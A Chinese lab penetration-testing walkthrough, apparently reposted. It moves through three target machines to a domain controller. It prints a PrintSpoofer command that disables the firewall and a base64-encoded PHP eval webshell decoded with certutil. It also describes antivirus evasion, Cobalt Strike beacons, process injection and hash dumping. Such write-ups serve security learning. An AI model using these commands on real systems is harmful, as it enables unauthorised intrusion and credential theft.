php主机 详解内网漫游姿势-绕杀软拿域控(下)
“
前言:
上周,小星与大家分享了绕杀软拿域控中的渗透、sql注入、密码找回漏洞三大操作过程。本期小星将会展示如何利用提权操作、提权免杀和其它方式,成功取得3台靶机权限,绕过安全拦
|
“ 前言: 上周,小星与大家分享了绕杀软拿域控中的渗透、sql注入、密码找回漏洞三大操作过程。本期小星将会展示如何利用提权操作、提权免杀和其它方式,成功取得3台靶机权限,绕过安全拦截以畅游内网。 上期回顾: ” 1. 查看主机,存在双网卡192.168.0.0/24以及10.10.1.0/24。
2. 查看进程,识别进程中当前主机上存在的安全狗和微软杀毒。
3. 查看已开放的服务,其中存在print spooler,后续我们可以利用该服务来进行提权操作。
4. 目前权限较低,需要进行提权操作。同时,因为当前主机存在杀软,所以需要进行免杀处理。网上搜索print spooler提权免杀,发现了可利用工具。
5. 上传PrintSpoofer64.exe到Windows/temp/目录下,执行命令提权成功后关闭防火墙。 PrintSpoofer64.exe -i -c "netsh advfirewall set allprofiles state off"。
6. 上线至CS,对10.10.1.0/24 主机进行存活扫描,发现10.10.1.130主机存活且开放了80端口。
7. 使用CS搭建socks4代理。此处原计划是利用msf来搭建socks5代理,但因其搭建代理后无法访问内网服务,所以最终选择了socks4完成操作。
8. 使用代理访问网站通达OA系统。
9. 搜索通达OA系统漏洞,此处可以直接使用OA相关工具来进行扫描利用,但该步骤以使用手工形式来进行漏洞利用。测试后发现,该系统存在文件上传以及文件中需要getshell 进行手工验证,直接访问 后显示用户未登录。
10. 搜索该漏洞详情,可以通过P参数来绕过代码逻辑。
11. 因为代码存在黑名单,先上传图片马,在使用文件中包含绕过过程。
12. 利用文件及其漏洞(含刚才上传的图片马)。 13. 执行命令,当前用户为system权限。
14. 此处尝试直接写入一句话木马,但是因为单引号、双引号被转义了,因此使用base64写入了一句话。 echoPD9waHAKZXZhbCgkX1BPU1RbaGFoYV0pOwo/Pg==> 1.txt type nul >haha.php certutil -f -decode 1.txt haha.php
15. 蚁剑设置代理后,连接刚才写入的webshell,成功拿下第二台机器。
16. 当前主机也存在双网卡 10.10.1.0/24和10.10.10.0/24。
17. 查看进程,发现存在域管理员进程。
18. 对进程进行杀软识别,发现进程存在360 软件。然而,此前写入的一句话没有做免杀处理php主机,但也没有被封杀,小星对此现象也在继续研究着。
19. 直接定位到域控为10.10.10.165。
20. 关闭当前主机的防火墙,并上线至CS。此处生成一个正向的木马,选择Beacon TCP。因为此处有360杀软,所以木马需要进行免杀处理。
21. 将木马文件上传到蚁剑并执行,在CS中执行 connect 10.10.1.130 4567 后成功上线。
22. 通过前面的信息搜集我们已经知道当前主机是存在域管理员进程的,此处尝试注入进程。
23. 成功获取域控权限,至此已经拿下这三台靶机权限。 备注:CS上线后要迁移进程,否则如果免杀处理不当,一段时间过后也会被杀软查杀的。
24. dump出所有用户有密码的hash。
总结 通过本次打靶、siteserver系统的多种利用方法,我们成功达成内网漫游的目标。虽然过程中遇到了如socks5代理搭建成功后却无法访问内网服务的问题,但在对内网的通达OA系统进行利用时,小星发现了我们是可以直接使用相关工具来快速利用的。只是因为小星个人比较喜欢手工,所以才使用了手工的方法。
(编辑:航空爱好网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
